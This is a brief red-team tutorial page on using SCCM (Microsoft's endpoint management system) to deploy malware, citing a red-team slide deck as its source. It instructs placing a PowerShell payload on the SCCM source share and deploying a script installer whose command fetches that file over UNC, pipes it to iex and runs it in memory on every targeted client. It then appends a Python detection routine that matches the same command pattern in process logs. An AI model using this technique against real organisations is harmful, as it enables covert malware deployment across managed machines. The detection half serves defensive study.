Malware Deployment

Compromise

  • Create an application/package that utilizes PowerShell for payload delivery and execution

    • Create a PowerShell payload and throw it up on the public share SCCM uses (i.e. sccmsource)

Tutorial

  • Create a Script installer application to fetch and execute your payload:

    • cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""

  • Deploy the application to your target group and wait for the SCCM agents to check in

    • Payload is fetched over UNC and runs in memory
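
A detection-side check for the command pattern above, as an added example that is not part of the original page: it scans process-creation command lines for PowerShell reading a file from a UNC path and piping it into iex, which is the trace this deployment leaves on each client. The event field names and sample records are constructed, and CcmExec.exe as the parent process is an assumption about how the SCCM client launches the installer.

```python
import re

# Get-Content (or a built-in alias) reading from a UNC path such as \\server\share\file
UNC_READ = re.compile(r"(?i)\b(?:gc|cat|type|get-content)\s+[\"']?(\\\\[^\\\s\"'|]+\\[^\s\"'|]+)")
# Output piped into Invoke-Expression or its alias
PIPE_IEX = re.compile(r"(?i)\|\s*(?:iex|invoke-expression)\b")
POWERSHELL = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")


def unc_iex_source(command_line):
    """Return the UNC path if PowerShell reads a remote file and pipes it to iex, else None."""
    if not POWERSHELL.search(command_line):
        return None
    read = UNC_READ.search(command_line)
    # The pipe to iex must come after the remote read for the content to be executed
    if read and PIPE_IEX.search(command_line, read.end()):
        return read.group(1)
    return None


def hunt(events):
    """events: iterable of dicts with 'host', 'parent', 'command_line' (assumed schema)."""
    hits = []
    for ev in events:
        path = unc_iex_source(ev["command_line"])
        if path:
            hits.append({"host": ev["host"], "parent": ev["parent"], "unc_path": path})
    return hits


# Constructed sample records, not taken from a real environment
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "CcmExec.exe",
     "command_line": r'cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""'},
    {"host": "WS02", "parent": "CcmExec.exe",
     "command_line": r'msiexec.exe /i "\\serverName\sharedFolder\ApplicationFolder\setup.msi" /qn'},
    {"host": "WS03", "parent": "explorer.exe",
     "command_line": r'powershell.exe -c "Get-Content C:\logs\app.log | Select-String error"'},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Because the payload runs in memory, the command line and the read against the share are the main artifacts; the returned UNC path identifies which file on the share to preserve and review.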

Sources

Red Team upgrades using SCCM for Malware Deployment - SlideShare
